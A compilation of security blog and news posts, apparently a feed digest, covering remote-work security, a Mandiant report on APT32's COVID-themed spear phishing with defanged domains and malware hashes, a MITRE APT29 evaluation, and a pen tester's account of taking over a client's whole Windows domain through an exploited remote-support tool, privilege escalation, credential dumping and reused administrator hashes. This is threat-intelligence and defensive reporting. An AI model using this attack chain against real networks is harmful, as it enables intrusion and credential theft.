The COVID-19 pandemic, which causes disruptions to businesses worldwide, continues to prove the flexibility of these companies in continuing their operations. This article tackles how BPO companies ensure data and cybersecurity when working from home due to the pandemic.

BPO companies and in-house employment

BPO companies value data and cybersecurity by following strict security measures in their daily operation. They keep employment in-house to monitor and ensure the security of their data. Most service providers, meanwhile, invest in high-quality infrastructures and backups in case of an electric outage and data breach.

Compliance is also mandatory for its operation. BPOs in India and the Philippines, the top outsourcing countries, apply for ISO and HIPAA standards to ensure that their operation meets the international standards. Keeping employees in-house helps process and compliance monitoring easier since the operation is done in a single location.

The impact of COVID-19 to in-house work

The global pandemic has affected the majority of businesses and in-house employment. Lockdowns in different countries have forced them to either halt operations or put their employees on remote work. The outsourcing industry also felt the challenges brought by this. 

Several countries have taken measures to continue their operations and stay business as usual. Work-from-home (WFH) employees are provided with equipment and internet connection to continue their work. Skeletal workforce and those who cannot render WFH are provided with accommodations in nearby hotels and lodging.

How remote work affects security for BPOs

According to Concentrix, a distributed workforce setup in the BPO industry is highly unusual since most of the operations are kept in-house

These companies know that remote working imposes risks in the cybersecurity of a business. An employee using a shared public network can pose a vulnerable threat to their client’s information. Without a VPN and strong firewall settings, their IP address, location, and data are exposed to malicious activities online. 

Encryptions are also important in protecting the company identity. Storages with weak encryptions also give way for hackers to steal critical information and use it for fraudulent transactions online or in the real world.

How to keep up with data security

The outsourcing industry is a flexible one. With the help of technology, BPO companies maintain the security of their data and processes remotely. The flexible arrangement has been a part of their business continuity plan in these unusual times. These examples show how BPO companies in the Philippines made a solution for working from home.

Data security

Letting their employees use a personal computer or a laptop may be ideal for creative, programming, and design roles. However, it won’t work for accounting and other roles that deal with critical customer and business information. 

With this, most companies provided the equipment for their tasks. Their data is either stored in the desktop’s hard disk or a cloud drive with encrypted security. Each storage is password-protected which only the employee and their employers can access.


Another risk of using a personal device for work is cybersecurity. A personal laptop does not have the adequate tools to protect their system from suspicious activities online. Using a shared connection even poses more threat to this. 

Desktops provided by the companies have secured VPN and firewall that protects them for their entire operation. For employees with slow or shared connections, companies provide a portable broadband connection for a smoother workflow.

Streamlined processes

Even in remote work, BPOs imply strict measures to ensure that their processes are streamlined. Employers have mastered using work collaboration tools and other online services while in the office so they can keep track of their work in real-time. 

Call centres, for instance, have a single CRM system used to record customer issues, capture information, and track issues via tickets.

The skeletal workforce, meanwhile, will supervise and monitor the progress of the deployed teams. They are also tasked to check the work quality of their employees, process transactions, close sales deals, and report to the client about their tasks.

Work collaboration

Deployed teams have little to no worries in work collaboration online. Many employees already use several tools such as Slack and Skype for communication, G Suite for documentation, and CRM apps for capturing and encoding data.

Employers also use screen monitoring software to track employees’ attendance and activities. This helps them have an overview of their performance, the total hour of their work, and the websites they have visited. Project monitoring tools, meanwhile, helps them keep track of the progress of the entire project and delegate tasks through their team.

Author Bio

Derek Gallimore is as passionate about outsourcing as he is for business and entrepreneurial-ism. Outsourcing is a booming industry. Derek believes that every business owner should be fully aware, and utilise this incredible opportunity. In response to a general lack of information, he has founded Outsource Accelerator. Outsource Accelerator is the world’s foremost independent and unbiased source of outsourcing information advisory and education.

The post Ensuring Data Security with Business Process Outsourcing Companies appeared first on Heimdal Security Blog.

Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

From late 2019, MAZE Ransomware started becoming infamous for its Encryption, data stealing and the subsequent selling of the stolen data. Few other reasons behind its popularity are also its unique targets and the ransom demands. From its inception around May 2019, MAZE actors are targeting multiple sectors, prominent ones…

Security Threats Facing Modern Mobile Apps

We use mobile apps every day from a number of different developers, but do we ever stop to think about how much thought and effort went into the security of these apps?

It is believed that 1 out of every 36 mobile devices has been compromised by a mobile app security breach. And with more than 5 billion mobile devices globally, you do the math.

The news that a consumer-facing application or business has experienced a security breach is a story that breaks far too often. As of late, video conferencing apps like Zoom and Houseparty have been the centre of attention in the news cycle.

As apps continue to integrate into the everyday life of our users, we cannot wait for a breach to start considering the efficacy of our security measures. When users shop online, update their fitness training log, review a financial statement, or connect with a colleague over video, we are wielding their personal data and must do so responsibly.

Let’s cover some of the ways hackers access sensitive information and tips to prevent these hacks from happening to you.

The Authentication Problem

Authentication is the ability to reliably determine that the person trying to access a given account is the actual person who owns that account. One factor authentication would be accepting a username and password to authenticate a user, but as we know, people use the same insecure passwords and then reuse them for all their accounts.

If a hacker accesses a user’s username and password, even if through no fault of yours, they are able to access that user’s account information.

Although two-factor authentication (2FA) can feel superfluous at times, it is a simple way to protect user accounts from hackers.

2FA uses a secondary means of authenticating the user, such as sending a confirmation code to a mobile device or email address. This adds another layer of protection by making it more difficult for hackers to fake authentication. 

Consider using services that handle authentication securely and having users sign in with them. Google and Facebook, for example, are used by billions of people and they have had to solve authentication problems on a large scale.
Reverse Engineering

Reverse engineering is when hackers develop a clone of an app to get innocent people to download malware. How is this accomplished? All the hacker has to do is gain access to the source code. And if your team is not cautious with permissions and version control systems, a hacker can walk right in unannounced and gain access to the source code along with private environment variables.

One way to safeguard against this is to obfuscate code. Obfuscation and minification make the code less readable to hackers. That way, they’re unable to conduct reverse engineering on an app. You should also make sure your code is in a private repository, secret keys and variables are encrypted, and your team is aware of best practices.

If you’re interested in learning more ways hackers can breach mobile app security, check out the infographic below from CleverTap.

Authored by Drew Page Drew is a content marketing lead from San Diego, where he helps create epic content for companies like CleverTap. He loves learning, writing and playing music. When not surfing the web, you can find him actually surfing, in the kitchen or in a book.

Safe Collaboration with McAfee and Microsoft Teams

McAfee MVISION Cloud for Microsoft Teams, the first and only CASB certified for Microsoft Teams, now offers a frictionless approach to data protection collaboration within Teams with new support for Microsoft encrypted webhooks. McAfee enforces compliance in Microsoft Teams via Data Loss Prevention (DLP) policies by using Microsoft Graph change notifications that provide a secure way to monitor chat messages in Teams via encrypted resource data in the payload. This enables McAfee customers to improve productivity of their employees by letting them use Microsoft Teams as a collaboration platform and participate in conversations and calls, and upload and share documents without compromising security.

Working from home has become a new reality for many, as more and more companies are requesting that their staff work remotely. Already, we are seeing how solutions that enable remote work and learning across chat, video, and file collaboration have become central to the way we work. Microsoft has seen an unprecedented spike in Teams usage and they now have more than 44 million daily users,* a figure that has grown by 12 million in just the last few  weeks. Those users have generated over 900 million meeting and calling minutes on Teams each day during the week of March 16.1 They recently shared the data below on their third anniversary.

McAfee MVISION Cloud for Microsoft Teams offers a cloud-native solution for organizations to consistently protect their data and defend against threats in the cloud. Here are a few of the use cases:

  • Modern data security. IT can extend existing DLP policies to messages and files in all types of Teams channels, enforcing policies based on keywords, fingerprints, data identifiers, regular expressions and match highlighting for content and metadata.
  • Collaboration control. Messages or files posted in channels can be restricted to specific users, including blocking the sharing of data to any external location.
  • Comprehensive remediation. Enables auditing of regulated data uploaded to Microsoft Teams and remediates policy violations by coaching users, notifying administrators, quarantining, tombstoning, restoring and deleting user actions. End users can autonomously correct their actions, removing incidents from IT’s queue.
  • Threat prevention. Empowers organizations to detect and prevent anomalous behavior indicative of insider threats and compromised accounts. McAfee captures a complete record of all user activity in Teams and leverages machine learning to analyze activity across multiple heuristics to accurately detect threats.
  • Forensic investigations: With an auto-generated, detailed audit trail of all user activity, MVISION Cloud provides rich capabilities for forensics and investigations.
  • On-the-go security, for on-the-go policies. Helps secure multiple access modes, including browsers and native apps, and applies controls based on contextual factors, including user, device, data and location. Personal devices lacking adequate control over data can be blocked from access.

Here’s a video introduction to MVISION Cloud for Microsoft Teams

Available now, MVISION Cloud for Teams helps meet customer demand in securing their most important cloud resources. McAfee MVISION Cloud for Microsoft Teams is now in use with a substantial number of large enterprise customers to enable their security, governance and compliance capabilities. The solution fits all industry verticals due to the flexibility of policies and its ease of use.

For More Information:

*Microsoft defines daily active usage as the maximum daily users performing an intentional action in a 24-hour period across the desktop client, mobile client, and web client. Intentional actions include sending or replying to a chat, joining a meeting, or opening a file in Teams. Passive actions like auto boot, minimizing a screen, or closing the app are not included.



The post Safe Collaboration with McAfee and Microsoft Teams appeared first on McAfee Blogs.

Email bungle at company seeking jobkeeper payments exposes staff’s personal details

Names, addresses and birthdates of more than 100 people shared in privacy breach

The company responsible for delivering traffic reports on radio and TV stations across Australia accidentally sent out the dates of birth, names and home addresses of more than 100 current and former staff to potentially thousands of people as the company seeks to apply for the jobkeeper payments.

Australian Traffic Network provides short traffic report updates during news bulletins to 80 radio and television stations, including the ABC, Seven, Nine, 10, 2GB and Triple M.

Related: As Australia takes on Google and Facebook over news content, the world is watching | Margaret Simons

Continue reading...

Getting Started With ROT Obfuscation

Hello, my name is John Strand. In this video, we’re going to be talking about ROT or rotate. Why exactly are we talking about one specific thing? Well, this particular video is used with our Cyber Range that we’re establishing at Black Hills Information Security and it’s very common when you’re pentesting or you’re doing […]

The post Getting Started With ROT Obfuscation appeared first on Black Hills Information Security.

How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers

Many students hold their college experience near and dear to their hearts. Apart from working towards a degree and a desired career path, students rely on college to make lifelong friends and gain a heightened sense of responsibility and independenceBut due to recent circumstances, many college students had this experience interrupted or put on pause. With many schools closed for the remainder of the year, college students have moved from in-person course work to virtual classrooms, or distance learningDistance learning has consequentially led to a rapid uptick in online learning among college students. But as more students continue their curriculum from home and online activity increasesthe need for enhanced security increases as well.  

Video Lectures

The transition to distance learning has led to many teachers and schools turning to online video conferencing tools to conduct virtual lectures. However, many of these tools have proven to lack the necessary security measures. As we’ve previously discussed, many users have been found sharing their meeting links on social media platforms like Twitter. This could allow an attacker to simply click on one of these links and interrupt an online lecture or club meeting with inappropriate content. As a result, students could lose valuable time meant to be spent toward their education. And while some schools have banned some online conferencing tools from being used for distance learning, it’s important for students to stay educated on the various security risks involved with video lectures, whether their school has provided guidelines or not.  

Connected Devices & Home Networks

Many schools and universities have asked for students to move out of their on-campus housing for the remainder of the school year. Moving off campus means that the devices and school networks provided by a campus may no longer be available to students. While many students already leverage their personal device for schoolwork, this situation makes those devices the only option.  

Additionally, much like those who have made the transition to working from home, using personal devices on home networks could pose a variety of threats. Students are moving from their universities’ professionally managed networks to home Wi-Fi setups protected with basic passwords, which are usually more easily infiltrated by hackers. Once a hacker gains access to a student’s home network, they have the opportunity to exploit other devices connected to the Wi-Fi.  

How to Secure Your Virtual Classroom

So, what can students do to help ensure that their path towards a degree isn’t interrupted by the adoption of distance learning? Taking online security seriously is the perfect place to start. Here are some tips to help ensure that learning from home goes as smoothly as possible.  

Choose an Encrypted Online Conferencing Tool

Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.   

Use a VPN

Avoid hackers infiltrating your network by using a VPNwhich allows you to send and receive data while encrypting, or scrambling, your information so others can’t read itBy helping to protect your network, VPNs also prevent hackers from gaining to other devices connected to your Wi-Fi.  

Take Password Protection Seriously.

Take the time to secure your devices and home network with unique, complex passwords. Many users, including students, utilize the same password, or variations of it, across all their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.  

Enable Two-Factor or Multi-Factor Authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

Stay Educated on Security Precautions

As you adapt to learning from home, you’ll likely consider downloading various online tools to help make the transition easier. Before downloading the first tools you see, do your research and check for possible security vulnerabilities or known threats 

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 


The post How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers appeared first on McAfee Blogs.

Updated Guidance: Responding to a Data Breach

PCI Security Standards Council recently updated the guidance document: Responding to a Cardholder Data Breach. This guide is intended to help merchants and service providers with incident response preparation. This guide also describes how and when a Payment Card Industry Forensic Investigator (PFI) should be engaged to assist.

Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage

From at least January to April 2020, suspected Vietnamese actors APT32 carried out intrusion campaigns against Chinese targets that Mandiant Threat Intelligence believes was designed to collect intelligence on the COVID-19 crisis. Spear phishing messages were sent by the actor to China's Ministry of Emergency Management as well as the government of Wuhan province, where COVID-19 was first identified. While targeting of East Asia is consistent with the activity we’ve previously reported on APT32, this incident, and other publicly reported intrusions, are part of a global increase in cyber espionage related to the crisis, carried out by states desperately seeking solutions and nonpublic information.

Phishing Emails with Tracking Links Target Chinese Government

The first known instance of this campaign was on Jan. 6, 2020, when APT32 sent an email with an embedded tracking link (Figure 1) to China's Ministry of Emergency Management using the sender address lijianxiang1870@163[.]com and the subject 第一期办公设备招标结果报告 (translation: Report on the first quarter results of office equipment bids). The embedded link contained the victim's email address and code to report back to the actors if the email was opened.

Figure 1: Phishing email to China's Ministry of Emergency Management

Mandiant Threat Intelligence uncovered additional tracking URLs that revealed targets in China's Wuhan government and an email account also associated with the Ministry of Emergency Management.

  • libjs.inquirerjs[.]com/script/<VICTIM>
  • libjs.inquirerjs[.]com/script/<VICTIM>
  • m.topiccore[.]com/script/<VICTIM>
  • m.topiccore[.]com/script/<VICTIM>
  • libjs.inquirerjs[.]com/script/<VICTIM>

The libjs.inquirerjs[.]com domain was used in December as a command and control domain for a METALJACK phishing campaign likely targeting Southeast Asian countries.

Additional METALJACK Activity Suggests Campaigns Targeting Mandarin Speakers Interested in COVID-19

APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets. While we have not uncovered the full execution chain, we uncovered a METALJACK loader displaying a Chinese-Language titled COVID-19 decoy document while launching its payload.

When the METALJACK loader, krpt.dll (MD5: d739f10933c11bd6bd9677f91893986c) is loaded, the export "_force_link_krpt" is likely called. The loader executes one of its embedded resources, a COVID-themed RTF file, displaying the content to the victim and saving the document to %TEMP%.

The decoy document (Figure 2) titled 冠状病毒实时更新:中国正在追踪来自湖北的旅行者, MD5: c5b98b77810c5619d20b71791b820529 (Translation: COVID-19 live updates: China is currently tracking all travelers coming from Hubei Province) displays a copy of a New York Times article to the victim.

Figure 2: COVID-themed decoy document

The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL. If the callout is successful, the malware loads the METALJACK payload into memory.

It then uses vitlescaux[.]com for command and control.


The COVID-19 crisis poses an intense, existential concern to governments, and the current air of distrust is amplifying uncertainties, encouraging intelligence collection on a scale that rivals armed conflict. National, state or provincial, and local governments, as well as non-government organizations and international organizations, are being targeted, as seen in reports. Medical research has been targeted as well, according to public statements by a Deputy Assistant Director of the FBI. Until this crisis ends, we anticipate related cyber espionage will continue to intensify globally.









Email Address



MD5: d739f10933c11bd6bd9677f91893986c


MD5: a4808a329b071a1a37b8d03b1305b0cb


MD5: c5b98b77810c5619d20b71791b820529

Decoy Document (Not Malicious)

Detecting the Techniques


Signature Name

Endpoint Security

Network Security

Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic

Email Security

Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic



Mandiant Security Validation Actions

  • A150-096 - Malicious File Transfer - APT32, METALJACK, Download
  • A150-119 - Protected Theater - APT32, METALJACK Execution
  • A150-104 - Phishing Email - Malicious Attachment, APT32, Contact Information Lure

MITRE ATT&CK Technique Mapping



Initial Access

Spearphishing Attachment (T1193), Spearphising Link (T1192)


Regsvr32 (T1117), User Execution (T1204)

Defense Evasion

Regsvr32 (T1117)

Command and Control

Standard Cryptographic Protocol (T1032), Custom Command and Control Protocol (T1094)

Using Big Tech to tackle coronavirus risks swapping one lockdown for another | Adam Smith

An app that logs movements and contacts might seem like a fair trade now but we risk giving away our privacy for good

Even when the lockdown is lifted, there is no guarantee that life will ever return to normal. To prevent a future outbreak of coronavirus, the UK will need to roll out mass testing, maintain some social distancing measures and closely monitor communities to curb future flare-ups.

In pursuing that last aim, governments across the world are developing technology to track our movements. When lockdown ends, technology could be a valuable means of controlling future outbreaks, alerting people to cases of Covid-19 in their area and hopefully preventing future shutdowns.

Related: The expansion of mass surveillance to stop coronavirus should worry us all | Veena Dubal

Continue reading...

COVID-19 and climate change

Today is Earth Day, an annual global event that aims to raise awareness of environmental issues.

This year’s event – the fiftieth Earth Day – falls in the midst of an unprecedented interruption to life as we know it, and so provides a unique opportunity for us to understand the impact we and our working habits have on the natural world.

The environmental benefits of staying at home

It should come as no surprise to learn that restrictions to contain the spread of the coronavirus pandemic have had a noticeably positive effect on the environment: already, air quality has improved, carbon emissions have dropped significantly and wildlife is thriving where once it was absent.

These are, of course, short-term effects, and many experts are understandably concerned that the environmental benefits caused by the lockdown will quickly be reversed once restrictions are lifted. However, we don’t have to go back to the way we were before. We can learn from the experience and change the way we live and work – to everyone’s advantage.

Calculating our own impact

Here at IT Governance, we have a climate change action group that aims to reduce our own environmental impact. We’ve calculated that in the current seven-week lockdown period alone we will have saved 41.46 metric tonnes of CO2 emissions: equivalent to the greenhouse gas emissions from an average passenger vehicle driving 101,737 miles, or around the world more than four times.

Obviously, this saving will be offset by increases in CO2 created in our homes, but the overall effect is undoubtedly still a good one. Factor in all the other companies that switched to remote working in mid-March and the effect on the environment in just a few weeks is little short of astonishing.

So, the question all responsible companies will now be asking is: how we can continue to benefit the environment and maintain productivity once the lockdown restrictions are lifted?

Homeworking: the new normal?

Campaigners have spent years pointing out that, with communication and collaboration technology, there’s little justification in insisting on your workforce assembling in one place each and every day unless they absolutely have to – they waste time commuting, you waste money providing offices and equipment, and both of you waste energy and cause damage to the environment.

Obviously, there are countless organisations that can’t modify their working practices to any great extent. For many others, the realisation that homeworking is actually a perfectly viable way of operating might well lead to remote staff continuing in some form or another after the restrictions are lifted – or at least for there to be greater flexibility than before COVID-19 came along.

Training courses and remote delivery

All change is, to an extent, disruptive, and if your staff have suddenly switched to homeworking you will face many challenges that you might not have anticipated or had time to address.

Read more about the cyber security risks associated with homeworking >>

Fortunately, we have everything you need to help adjust to this new normality.

Almost all of our products and services are capable of being delivered remotely, and we’ve launched a range of new ones to help our clients through the coronavirus crisis, including training and staff awareness courses, penetration testing and vulnerability scanning.

Learn more about how we can help you >>


The post COVID-19 and climate change appeared first on IT Governance UK Blog.

SOC vs MITRE APT29 evaluation – Racing with Cozy Bear

MITRE just released the results of the APT 29 evaluation of 21 commercial cybersecurity products today, including McAfee MVISION EDR. This evaluation, conducted in the form of a collaborative attack and defense exercise, is based on ATT&CK®, a freely available and open source knowledge base of adversary tactics and techniques that is widely used by blue teamers (the defenders) to find gaps in visibility, defensive tools, and processes.

In this evaluation, MITRE, played the role of a red team (the attacker), using its ATT&CK knowledge base to examine MVISION EDR and MVISION Endpoint’s ability to detect the tactics and techniques used by APT29 (also known as Cozy Bear, The Dukes and Cozy Duke among others). APT29, is the group believed to operate on behalf of the Russian government that compromised the Democratic National Committee starting in 2015. This evaluation took place over a period of two days. On each day a different version of the attack comprised of 10 steps was executed using several techniques attributed to APT29.

While it’s important to note that the goal of these evaluations is not to rank or score products, our analysis of the results found that McAfee’s blue team was able to use MVISION EDR to obtain a significant advantage over the adversary, achieving:

  • 100% visibility of the attack steps on Day 1, and 89% on Day 2
  • 90% detection of the attack steps on Day 1, and 67% on Day 2

During the assessment we also installed MVISION Endpoint in observe, non-blocking mode. This allowed us to determine that the blue team would have automatically blocked 40% of all the attack steps performed by the red team on Day 1 and 33% on Day 2.

However, as all practitioners know, cyber defense is more complicated than what raw data can express, especially when dealing with sophisticated threat actors. Years of warfare both in the physical and cyber space have taught us that observing and analyzing raw data is useless until it is framed in a way that provides context to both attackers and defenders.

While attacker actions and behaviors can be modeled effectively using MITRE ATT&CK, models[1] like Time Based Security (TBS) or OODA loop (Observe, Orient, Decide, Act) provide the context that blue teamers and security operations teams need to make tactical defensive decisions.

Time Based Security – Protection, Detection & Response in context

Time Based Security[2] (TBS), was introduced in 1999 by Winn Schwartau and is still one of the most relevant, effective and yet terribly simple security models any defender can apply today. The principles enumerated in Schwartau’s book are essential for any blue teamer, regardless of whether you are a CISO, a SOC analyst, a security architect or an incident responder. TBS provides a systematic and reproducible method to answer questions like, how much ‘security’ a product or technology provides, or in this case, how secure your systems are against an adversary that behaves like APT29.

TBS provides a methodological, quantitative, mathematically proven method, that merges information security and risk management to support security budget decision making. For example, when evaluating how much ‘security’ a product or technology like EDR provides, security operations teams and CISOS need to find answers for these questions:

  1. How long are my systems exposed?
  2. How long before we detect a compromise?
  3. How long before we respond?

To illustrate, in the physical world, you can buy a safe to protect any asset, and you would know how long it would take for somebody to break through that safe. These performance ratings are generally ranked by the amount of time your valuables are safe when under attack by either burglary or fire[3]. But we would never think of just putting the safe and waiting for the bad guys to break in it, sitting idle, right? That is why we put detection mechanisms around it, motion sensors, heat sensors, window alarms, vibration sensors, cameras, and security guards to monitor them. Can we measure how long it takes for an attacker to trip any of those sensors? Absolutely! Once that alarm goes off, what do we do? We react, we call the police and they show up to limit the impact. Can we measure that reaction time? Of course! Everything in the physical security world is about time.

Figure 1: Quoting Schwartau, “If it takes longer to detect and to respond to an intrusion than the amount of protection time afforded by the security measures, that is if P < D + R, then effective security is impossible to achieve in this system.”

TBS establishes that in the cybersecurity world, just like in the physical one, protection runs parallel to detection and reaction (see Figure 1). If the intruder is willing to dedicate resources to bypass the protection mechanisms, and in the absence of any detection or reaction, the attacker can always win. In the end, compromising a system is just a matter of time.

Racing with APT29 – It’s All About Time

While many vendors focus solely on the raw data and statistics, our approach is focused on modeling how a blue teamer, a SOC analyst or a cyber defender would do against this attack, considering the TBS model. For this evaluation, our blue team used our products as follows:

  • Endpoint Protection – Protection was not the focus of this MITRE ATT&CK, therefore, we assumed worst case scenario and installed McAfee MVISION Endpoint disabled, in monitoring mode. Regardless, the alarms triggered by the McAfee protection mechanism can be considered as a HIGHLY tactical detection mechanism. As every SOC analyst knows, a block is never a “block and forget”, but a “block and investigate”.
  • Endpoint Detection through McAfee MVISION EDR (focus of MITRE ATT&CK). 

While MVISION EDR reaction capabilities were not considered as part of this evaluation, it’s evident that a fast reaction is a key element in the TBS equation (P > D+R) for a reduced exposure and therefore to a limited impact against any adversary [4].

Using the results of the evaluation, we modeled the data following an attack timeline, grouping the techniques executed by the MITRE ATT&CK red team for Days 1 and 2 into each of the steps (attack milestones) they employed. As a SOC, our objective would be to block, detect and react as early as possible in the attack timeline, knowing that once the attacker has stolen credentials and started lateral movement, their advantage and the impact of the attack grows exponentially. For this reason, we draw a line right before the ‘lateral movement’ step. We call this the ‘breakout point’.

To represent the data for each evaluation day, we list the detection categories used by MITRE[5] in addition to:

  • Block: Detections triggered by MVISION Endpoint that would have resulted in a blocked activity. These alarms would have slowed down the attacker as well as provided a highly tactical detection to the SOC.
  • Host interrogation: Represents data that is manually pulled from an endpoint. In MVISION EDR this data can reside in the Cloud or on the endpoint itself, and can be retrieved through real time searches, the collection engine, or through automated investigations.

Observing Figures 2 & 3 below, the results show:

  1. Had prevention been enabled on the endpoints (the default configuration for McAfee MVISION Endpoint), the defenders would have blocked 29% of the steps performed by the attacker before the breakout point on Day 1, and 40% on Day 2. As a SOC, this would have met our objective of disrupting the attacker several times, slowing down the attack to extend our protection time (P).
  2. The blue team was able to detect 86% of the steps performed by the attacker before the breakout point on Day 1, and 60% on Day 2. The early detections (D) of these tactics and techniques, augmented with additional context provided by telemetry and host interrogation allow the SOC to reduce exposure and speed up response and remediation efforts (R).
  3. The blue team was able to see 100% of the steps performed by the attacker before the breakout point on Day 1, and 80% on Day 2. This visibility was readily available to the SOC without the need to use additional tools and therefore saving time.
Figure 2: APT29 emulated on 10 steps using Pupy, Meterpreter, and custom scripts (Day 1)


Figure 3: APT29 emulated on 10 steps using POSHC2 and custom scripts (Day 2). Note that step 19 was removed by MITRE due to emulation issues.


On both Day 1 and Day 2, the blue team would have been able to receive early indication of an attack multiple times before the breakout point. The protection capabilities would have also disrupted the attacker several times. All this give defenders time to respond using EDR’s capabilities to triage, scope, investigate, contain, and eradicate the threat, including the isolation of the affected systems. Additionally, MVISION EDR capabilities like threat clustering and machine learning assisted investigations would have helped to accelerate the response, resulting in reduced exposure time (Exposure=Detection+Reaction) which would have allowed the SOC to manage the risk of this intrusion, reducing the impact of a compromise.

In summary, security solutions cannot be evaluated by raw data without putting them into context and into the right defensive framework. The MITRE APT29 evaluation shows how McAfee provides effective time-based security by combining protection, as well as early detection and fast response across critical points along the attack chain, enabling Security Operation teams and cyber defenders to reduce exposure and limit impact of attacks, even sophisticated ones.

* MVISION Endpoint is part of our McAfee endpoint protection technology, optimized for Windows 10.







The post SOC vs MITRE APT29 evaluation – Racing with Cozy Bear appeared first on McAfee Blogs.

Pen Testing Stories from the Field: Combining Tools to Take Over an Entire Domain


There is no single set of instructions on how to run a penetration test, and no one manual on how to be a pen tester. The only real constant is that each job is a combination of preparation and improvisation to adapt and adjust to each environment’s quirks. So one of the best ways to learn and improve your own penetration testing techniques and strategies is from your peers, whether it be through watching them on the job, or from talking shop at a conference and hearing how they handled an interesting assignment. With this in mind, after we spoke with a pen tester about a recent job his team had completed with the assistance of Core Security’s tools, we asked him to go into detail, in order to pass along some valuable lessons from the field.

What was the engagement?

We were tasked with completing an internal penetration test on a large, multi-national manufacturer.

What tools were you using?

We had a jumpbox laptop that we placed on the network. We used a Nessus vulnerability scanner, as well as a variety of pen testing tools, including Core Impact and Cobalt Strike. And of course, our powers of reasoning and deduction.

Had this company ever had a pen test performed?

Yeah, quite a few, actually. They told us the one they had conducted the year prior had turned up “nothing in particular,” so we were pretty curious to check out the environment for ourselves.

So, where did you begin?

Once we had the jumpbox laptop installed, we ran the Nessus scan. The scan indicated that there were 23 machines running the Solarwinds Dameware Mini Remote Control—a tool that IT teams can use for remotely accessing employees’ computers, laptops, or servers for support. Core Impact happens to have an excellent exploit for this product, so we used it and managed to get onto 13 machines. We installed an agent onto all 13 of these machines, but only as an unprivileged user account, so our initial access was fairly limited.

How did you manage to escalate your privileges?

We used Impact’s privilege escalation RPT (Rapid Penetration Test), which saved us several hours. CVE-2020-0668 is a privilege elevation vulnerability in the Windows kernel. There is a patch for it, but we still found it on several machines, and were able to use it to place an agent running as SYSTEM, which is the Windows version of what a lot of people know as the “root” or superuser account.

Next, Core Impact’s Windows Secrets Dump module, which can collect user credentials from a compromised machine, helped us obtain the local password hash database. Looking at the database, we noticed that the “administrator” user had the same hash on four of the workstations. We wondered if this administrator had the same credentials on other machines.

It turned out that the administrator did have the same credentials elsewhere, and we were able to get into a couple hundred machines. We used the hash with CrackMapExec to get access to the LSA Secrets, which housed a large amount of domain cached credentials. Ultimately, we were able to harvest 900 other user credentials, including multiple Domain Admins. We also used the hash to deploy the Cobalt Strike beacon payload across other systems compromising the environment even further.

Yikes. How far did you take the compromise?

Oh, we eventually took over the entire domain. We had complete control.

That was probably an unpleasant surprise for the organization. But better that your team found it out now instead of an attacker down the line. How could this have been avoided? What would you suggest they, and other organizations, prioritize to mitigate risk?

Well, to start, patch often and patch everything. If a patch is available for any of your devices, patch them. If a patch is available for any of your third-party software, patch them.

Also, never use the same credentials across machines—it’s a great way for attackers to quickly move laterally across the organization without much effort.  

Use two factor authentication for elevated access. Just do it.

And, naturally, I strongly encourage hiring savvy pen testers on a regular basis to validate those remediations.


Lessons from the field: Domain control
Penetration testing
Big text: 
Resource type: 
Want to learn more pen testing lessons?

Watch our webinar, "Getting Inisde the Mind of an Attacker: TLS Attacks and Pitfalls" to learn about exploiting this security protocol.

DNS is on the Verge of a Major Overhaul

Reading Time: ~ 4 min.

One of the things about working in internet technology is nothing lasts forever… [Students] come to me and they say, ‘I want to do something that has an impact 20, 50, or 100 years from now.’ I say well maybe you should compose music because none of this technology stuff is going to be around that long. It all gets replaced.” -Paul Mockapetris, co-inventor of the domain name system (DNS)

As foresighted as he may have been, the DNS inventor Paul Mockapetris got one thing wrong in a retrospective interview about his contribution to internet history. Namely, some aspects of technology do have at least 20-year staying power. In this case, his own invention: the domain name system.

But DNS, just three years shy of its fortieth birthday, is on the cusp of a major reimagining. One that could enhance the privacy of business and private users alike for some time to come. According to some experts, it may even be worthy of the title “DNS 2.0.”

The Problem with DNS Today

While DNS has evolved significantly in the more than 35 years since originally conceived, the skeletal structure remains much the same. DNS is the internet’s protocol for translating the URLs humans understand into the IP addresses machines do.

The problem is that this system never meant to consider privacy or security. With DNS today, requests are made and resolved in plain text, providing intrusive amounts of information to whomever may be resolving or inspecting them. That is most likely an internet service provider (ISP), but it may be a government entity or some other source. In authoritarian countries, governments can use this information to prosecute individuals for visiting sites with outlawed content. In the United States, it’s more likely to be monetized for its advertising value.

“The problem with DNS is it exposes what you’re doing,” says Webroot product manager and DNS expert Jonathan Barnett. “If I can log a user’s DNS requests, I can see when they work, when they don’t, how often they use Facebook, the Sonos Speakers and Google Nests on their network, all of that. From a privacy perspective, it shows what on the internet is associating with me and my network.”

This can be especially problematic in terms of home routers. Whereas business networks tend to be relatively secure—patched, up-to-date, and modern—”everyone’s home router tends to be set up by someone’s brother-in-law or an inexperienced ISP technician,” warns Barnett. In this case, malicious hackers can change DNS settings to redirect to their own resolvers.

“If you bring a device onto this network and try to navigate to one of your favorite sites, you may never wind up where you intended,” says Barnett.

In the age of COVID-19, it’s becoming an even bigger problem for employers. With a larger workforce working from home than perhaps ever before, traditional defenses at the network perimeter no longer remain.

“To maintain resilience,” says Barnett, “companies need to extend protection beyond the business network perimeter. One of the best ways to do that is through DNS protection that ensures requests are resolved through a trusted resolver and not a potentially misconfigured home network.”

DoH: The Second Coming of DNS

